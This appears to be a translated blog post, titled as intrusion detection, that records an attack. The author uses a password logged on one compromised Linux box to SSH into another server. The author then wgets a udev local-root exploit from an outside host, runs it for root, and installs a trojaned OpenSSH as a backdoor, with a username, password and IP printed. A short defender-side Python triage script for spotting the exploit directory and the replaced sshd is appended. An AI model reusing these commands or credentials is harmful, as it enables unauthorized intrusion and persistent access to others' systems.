Checking programs on a compromised Linux box: a simple manual intrusion-detection walkthrough on a Linux zombie

Today I found that on one compromised box someone had ssh'd to another server, and the password had been logged.

[root@mail ~]# cat /tmp/sshpswd

ldc:sle823jfsGs@222.222.66.11

Ssh straight in.

[root@mail ~]# ssh ldc@222.222.66.11

ldc@222.222.66.11's password:

Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200

[ldc@localhost ldc]$ cat /etc/issue

Red Hat Enterprise Linux Server release 5 (Tikanga)

Kernel \r on an \m

[ldc@localhost ldc]$ uname -a

Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

It's RHEL 5.0 with the kernel never upgraded, so the vmsplice local root should work; but when I tried it the machine hung, so I switched to the udev one, which worked.

[ldc@localhost ldc]$ mkdir .v

[ldc@localhost ldc]$ cd .v

[ldc@localhost .v]$ wget http://211.100.50.70/u.sh

13:21:09 http://211.100.50.70/u.sh

Connecting to 211.100.50.70:80… .. 200 OK

Length: 3366 (3.3K) [application/x-sh]

Saving to: `u.sh'

100%[===========================================================================================>] 3,366 --.-K/s in 0.04s

13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]

[ldc@localhost .v]$ ls

r00t r00t.c u.sh

[ldc@localhost .v]$ chmod +x u.sh

[ldc@localhost .v]$ cat /proc/net/netlink

sk Eth Pid Groups Rmem Wmem Dump Locks

f69f8800 0 2486 00000111 0 0 00000000 2

f7fdae00 0 0 00000000 0 0 00000000 2

c2132200 6 0 00000000 0 0 00000000 2

f6a57a00 7 2143 00000001 0 0 00000000 2

f7caf000 7 0 00000000 0 0 00000000 2

f6a0be00 9 2143 00000000 0 0 00000000 2

f6a61200 9 1996 00000000 0 0 00000000 2

f7de1c00 9 0 00000000 0 0 00000000 2

f7d6ca00 10 0 00000000 0 0 00000000 2

f7fb3200 11 0 00000000 0 0 00000000 2

c2154200 15 476 ffffffff 0 0 00000000 2

f7fdac00 15 0 00000000 0 0 00000000 2

f7fb3000 16 0 00000000 0 0 00000000 2

c21cde00 18 0 00000000 0 0 00000000 2

[ldc@localhost .v]$ ps aux | grep udev

root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d

ldc 3462 0.0 0.0 4128 680 pts/0 S 13:00 0:00 grep udev

[ldc@localhost .v]$ sh u.sh 476

suid.c:

suid.c:3:

sh-3.1# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

We're root now.

First, let's leave an ssh backdoor.

sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz

13:32:08 http://211.100.50.70/openssh4.3p2.tar.gz

Connecting to 211.100.50.70:80… 200 OK

Length: 979990 (957K) [application/x-gzip]

Saving to: `openssh4.3p2.tar.gz'

100%[===========================================================================================>] 979,990 1.14M/s in 0.8s

13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]

sh-3.1# tar zxf openssh4.3p2.tar.gz

sh-3.1# cd openssh-4.3p2/

sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh

checking for gcc... gcc

checking for C compiler default output file name... a.out

............(several lines omitted)

sh-3.1# make && make install

conffile=`echo sshd_config.out | sed s/.out$//`;

/bin/sed -e s|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g -e

............(several lines omitted)

sh-3.1# cp ssh_config sshd_config /etc/ssh/

sh-3.1# /etc/rc.d/init.d/sshd restart

STOP sshd [OK]

START sshd [OK]

OK, now log in through our sshdoor.

[root@localhost ~]# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

[root@localhost ~]# netstat -lntp

Active Internet connections (only servers)

Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name

tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod
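From the defender's side, the walkthrough above leaves two durable artifacts on the box: a hidden directory in a user's home holding exploit source (r00t.c, u.sh) next to a freshly built binary (r00t), and an sshd rebuilt from source with --prefix=/usr, which overwrites the files owned by the OpenSSH RPM. The triage below is an added example, not code from the original post; the home tree and the `rpm -V` output it checks are constructed samples, and `rpm` itself is never invoked.

```python
import os
import tempfile

ELF_MAGIC = b"\x7fELF"

def hidden_dirs_with_build_artifacts(home_root):
    """Hidden dirs under home_root holding C/shell sources next to an ELF binary."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(home_root):
        if not os.path.basename(dirpath).startswith("."):
            continue
        has_src = any(f.endswith((".c", ".sh")) for f in filenames)
        has_elf = False
        for f in filenames:
            try:
                with open(os.path.join(dirpath, f), "rb") as fh:
                    has_elf = has_elf or fh.read(4) == ELF_MAGIC
            except OSError:
                pass  # unreadable file: skip it, do not abort the sweep
        if has_src and has_elf:
            hits.append(dirpath)
    return hits

def modified_package_files(rpm_verify_output):
    """Parse `rpm -V <pkg>` output: files whose size (S) or digest (5) differ
    from the package, or that are missing. Flag column first, path last."""
    changed = []
    for line in rpm_verify_output.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        flags, path = parts[0], parts[-1]
        if flags == "missing" or "S" in flags or "5" in flags:
            changed.append(path)
    return changed

# Constructed `rpm -V openssh-server` output (not captured from a real host).
SAMPLE_RPM_V = """S.5....T    /usr/sbin/sshd
.......T  c /etc/ssh/sshd_config
"""
def build_sample_home():
    """Constructed home tree: <tmp>/ldc/.v with r00t.c, u.sh and an ELF r00t."""
    root = tempfile.mkdtemp()
    v = os.path.join(root, "ldc", ".v")
    os.makedirs(v)
    for name, data in (("r00t.c", b"int main(void){return 0;}"),
                       ("u.sh", b"#!/bin/sh\n"), ("r00t", ELF_MAGIC + b"\x01")):
        with open(os.path.join(v, name), "wb") as fh:
            fh.write(data)
    return root
```

On a live host, point hidden_dirs_with_build_artifacts at /home and feed modified_package_files the real `rpm -V openssh-server` output; a changed /usr/sbin/sshd with a recent mtime is the signal to pull the binary for analysis rather than trust the running daemon.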
